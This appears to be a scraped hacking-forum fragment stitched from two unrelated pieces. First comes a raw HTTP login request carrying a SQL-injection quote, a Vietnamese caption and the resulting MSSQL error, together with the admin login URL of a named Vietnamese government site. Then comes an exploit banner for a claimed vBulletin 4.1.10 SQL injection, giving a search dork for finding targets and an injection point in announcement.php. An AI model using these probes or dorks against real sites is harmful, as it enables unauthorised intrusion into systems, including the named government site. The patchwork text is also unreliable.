Download:
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://victim.com/admin/logon.asp
Cookie: ASPSESSIONIDCACDCDTR=HAHFJONADOABKNAPNPFIAHJC
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
User=%27&Pass=&func=Authen
Và lỗi MSSQL sẽ là:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'pltMrViNNHNL6'.
/admin/logon.asp, line 71
http://thuvien.mard.gov.vn/admin/logon.asp
################################################## ######
#
# Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir
#
# Software Link : http://vbulletin.com
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : "Powered By Vbulletin"
#
################################################## ######
#
# Expl0iTs :
#
# [TarGeT]/announcement.php?a=&announcementid=[Sql]
#
################################################## #######
#
# Greats : Zarbat.Org - Aria-Security.Com - datacoders.org - black-hg.org
#
# Security7.ir - AjaxTm.Com - Sepehr-Team.Org And All Iranian Hackers
#
################################################## #######